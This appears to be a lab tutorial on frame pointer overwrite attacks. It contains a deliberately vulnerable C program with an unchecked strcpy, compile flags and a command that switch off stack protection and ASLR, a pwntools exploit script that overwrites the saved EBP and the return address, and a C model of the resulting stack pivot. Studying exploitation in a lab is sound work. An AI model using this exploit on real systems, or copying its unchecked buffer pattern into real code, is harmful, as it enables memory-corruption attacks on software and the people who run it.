strangerRidingCaml
Frame Pointer Overwrite Attacks Lab
In this lab, we exploit a stack buffer overflow to overwrite the saved frame pointer (EBP) and the return address of a function, and use those two overwritten slots to take control of program flow.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
/* No length check: anything past 64 bytes runs into the saved EBP and the return address above the buffer. */
strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program executed successfully.\n");
return 0;
}
Save the above code to a file named vulnerable.c
and compile it as a 32-bit, non-PIE binary (the exploit below uses p32 and targets EBP) with the stack protector disabled and an executable stack:
$ gcc -m32 -no-pie -o vulnerable -fno-stack-protector -z execstack vulnerable.c
For the stack addresses used below to stay the same from run to run, disable ASLR on the lab machine while you work:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools that overwrites the saved frame pointer and the return address.
from pwn import *
# Path to the vulnerable binary (32-bit, no PIE, no stack protector)
binary_path = './vulnerable'
# Distance from the start of buffer to the saved frame pointer: 64 bytes of buffer
# plus whatever padding the compiler inserts. Confirm it in gdb by overflowing
# with a pattern and reading which bytes land in EBP at the crash.
offset = 72
# Value written over the saved EBP. When main later executes its own
# `leave; ret`, `mov esp, ebp` turns this value into main's stack pointer,
# so it should point at memory we control.
fake_ebp = 0xdeadbeef # Example value (change as needed)
# Value written over vulnerable_function's return address
return_address = 0xdeadbeef # Example address (change as needed)
# Craft the payload: padding, fake frame pointer, return address
payload = b'A' * offset
payload += p32(fake_ebp) # Overwrites the saved EBP
payload += p32(return_address) # Overwrites the return address
# The program reads its input from argv[1], not from stdin, so the payload is
# passed as a command-line argument. argv strings are NUL-terminated, so
# neither address may contain a 0x00 byte or strcpy stops copying there.
assert b'\x00' not in payload
p = process([binary_path, payload])
p.interactive()
Explanation of the Python script:
- We specify the value that will overwrite the saved frame pointer and the address the function will return to.
- The payload consists of padding up to the saved EBP, followed by the fake frame pointer value and the return address.
- We launch the vulnerable binary with the payload as its command-line argument (it copies argv[1] into buffer), which triggers the overflow. p.interactive() lets us interact with the process afterwards; if return_address points at working shellcode, that is a shell.
3. Exploiting the Vulnerability:
Execute the Python script to exploit the buffer overflow:
$ python3 exploit.py
With the placeholder value 0xdeadbeef the process simply crashes with a segmentation fault, which already confirms that both the saved EBP and the return address are under our control (check the registers in gdb). To turn that into a shell, return_address must point at shellcode placed on the executable stack (the -z execstack option is what allows it to run), or fake_ebp must point at a fake frame you control so that main's `leave; ret` pivots the stack into your data. Once those values are correct, p.interactive() gives you a shell prompt.
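To make concrete what the two overwritten slots actually do, here is a small model of the 32-bit epilogue (`leave; ret`) run over a smashed frame. It is an added example, not code from the original lab: every address in it (STACK_BASE, BUF_ADDR, MAIN_EPILOGUE, SHELLCODE) is a hypothetical placeholder, and in a real run those values come from gdb. It shows the three outcomes discussed above: a direct return-address overwrite, a pivot through the fake EBP into a fake frame placed in the padding, and the crash you get with the page's placeholder value. It also rejects payloads containing a NUL byte, since the input travels through argv.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical addresses for the model; a real run takes these from gdb. */
#define STACK_BASE    0xffffd000u             /* first byte of the modelled stack region */
#define IMAGE_SIZE    256u
#define BUF_ADDR      (STACK_BASE + 64u)      /* &buffer inside vulnerable_function (assumed) */
#define EBP_OFF       72u                     /* buffer start -> saved ebp (the lab's offset) */
#define MAIN_EPILOGUE 0x080491a0u             /* assumed address of main's own `leave; ret` */
#define SHELLCODE     0xffffd108u             /* assumed address of shellcode on the stack */

typedef struct { uint32_t esp, ebp, eip; } cpu_t;

/* Little-endian read from the modelled region; anything outside it reads as 0. */
static uint32_t rd32(const uint8_t *img, uint32_t addr) {
    uint32_t off = addr - STACK_BASE;
    if (off > IMAGE_SIZE - 4) return 0;
    return (uint32_t)img[off] | (uint32_t)img[off + 1] << 8 |
           (uint32_t)img[off + 2] << 16 | (uint32_t)img[off + 3] << 24;
}

/* Little-endian write: the same thing pwntools' p32() does. */
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* The function epilogue: mov esp, ebp ; pop ebp ; ret */
static cpu_t leave_ret(const uint8_t *img, cpu_t c) {
    c.esp = c.ebp;
    c.ebp = rd32(img, c.esp); c.esp += 4;
    c.eip = rd32(img, c.esp); c.esp += 4;
    return c;
}

/* Lab payload: padding + p32(fake_ebp) + p32(ret). Bytes 4..7 of the padding
 * hold `target`, so a pivot onto the buffer finds [ebp][target] as a fake frame.
 * Returns 0 if any byte is NUL: argv[1] is a C string, so strcpy would stop there. */
static size_t build_payload(uint8_t *out, size_t cap, uint32_t fake_ebp,
                            uint32_t ret, uint32_t target) {
    size_t len = EBP_OFF + 8;
    if (cap < len) return 0;
    memset(out, 'A', EBP_OFF);
    wr32(out + 4, target);            /* out[0..3] stays "AAAA": the ebp main will pop */
    wr32(out + EBP_OFF, fake_ebp);    /* overwrites vulnerable_function's saved ebp */
    wr32(out + EBP_OFF + 4, ret);     /* overwrites its return address */
    for (size_t i = 0; i < len; i++)
        if (out[i] == 0) return 0;
    return len;
}

/* Length of the payload that would be sent, or 0 if it cannot pass through argv. */
static size_t payload_len(uint32_t fake_ebp, uint32_t ret, uint32_t target) {
    uint8_t tmp[IMAGE_SIZE];
    return build_payload(tmp, sizeof tmp, fake_ebp, ret, target);
}

/* strcpy the payload into the frame, run vulnerable_function's epilogue and, if
 * control lands on main's epilogue, that one too. Returns the CPU state at the
 * point where execution leaves the modelled code. */
static cpu_t simulate_attack(uint32_t fake_ebp, uint32_t ret, uint32_t target) {
    uint8_t img[IMAGE_SIZE], payload[IMAGE_SIZE];
    memset(img, 0xcc, sizeof img);
    size_t n = build_payload(payload, sizeof payload, fake_ebp, ret, target);
    memcpy(img + (BUF_ADDR - STACK_BASE), payload, n);
    img[BUF_ADDR - STACK_BASE + n] = 0;           /* strcpy's terminator */

    cpu_t c = { .esp = 0, .ebp = BUF_ADDR + EBP_OFF, .eip = 0 };
    c = leave_ret(img, c);                         /* ebp = fake_ebp, eip = ret */
    if (c.eip == MAIN_EPILOGUE)
        c = leave_ret(img, c);                     /* main's leave; ret: esp = fake_ebp */
    return c;
}

int main(void) {
    cpu_t pivot  = simulate_attack(BUF_ADDR, MAIN_EPILOGUE, SHELLCODE);
    cpu_t direct = simulate_attack(0x41414141u, SHELLCODE, SHELLCODE);
    cpu_t crash  = simulate_attack(0xdeadbeefu, 0xdeadbeefu, SHELLCODE);
    printf("pivot via fake ebp : eip=%08x esp=%08x ebp=%08x\n", pivot.eip, pivot.esp, pivot.ebp);
    printf("direct return addr : eip=%08x esp=%08x\n", direct.eip, direct.esp);
    printf("page's 0xdeadbeef  : eip=%08x (unmapped -> SIGSEGV)\n", crash.eip);
    printf("target with a NUL byte -> payload length %zu\n",
           payload_len(BUF_ADDR, MAIN_EPILOGUE, 0xffffd100u));
    return 0;
}
```

The pivot case is the one that gives the technique its name: vulnerable_function returns normally to main, but main's `mov esp, ebp` now loads the attacker's fake_ebp, so its `pop ebp; ret` takes both values from the buffer and execution continues at `target` with esp pointing into the payload. Note that in this model 0xffffd100 is unusable as a target because its low byte is 0x00, which is exactly the argv constraint the exploit script has to respect.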